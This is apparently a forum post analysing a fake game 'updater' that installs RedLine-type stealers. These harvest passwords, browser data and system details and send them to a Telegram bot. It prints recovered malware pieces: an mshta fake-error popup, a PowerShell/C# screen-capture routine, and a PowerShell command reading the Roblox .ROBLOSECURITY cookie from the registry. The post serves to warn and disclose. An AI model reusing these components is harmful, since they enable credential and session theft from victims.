Hello everyone!
Did a bit of a research.
it's basically a Readlinestealer, and some other noname grabbers, stealers. when you open the "updater" it downloads m2.exe metin2.exe to temp files from a chinese host, opens them, and those download redline configs, then scan registry, pc name, installed apps, browser extensions, steal the pw's, userdatas.
Bob.exe same thing, but it connects to a telegram api, then sends your infos there.
Its a shitty ass py2exe.
The fake error msg comes from here : mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Unsupported WINDOWS Version or outdated CLIENT files. ERRORCODE 9042', 0, 'Unsupported Version', 0+16);close()""
$source = @" using System; using System.Collections.Generic; using System.Drawing; using System.Windows.Forms; public class Screenshot { public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; } } "@ Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms $screenshots = [Screenshot]::CaptureScreens() for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose() })
lmao
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.co m -Name .ROBLOSECURITY" (PID: 6504)
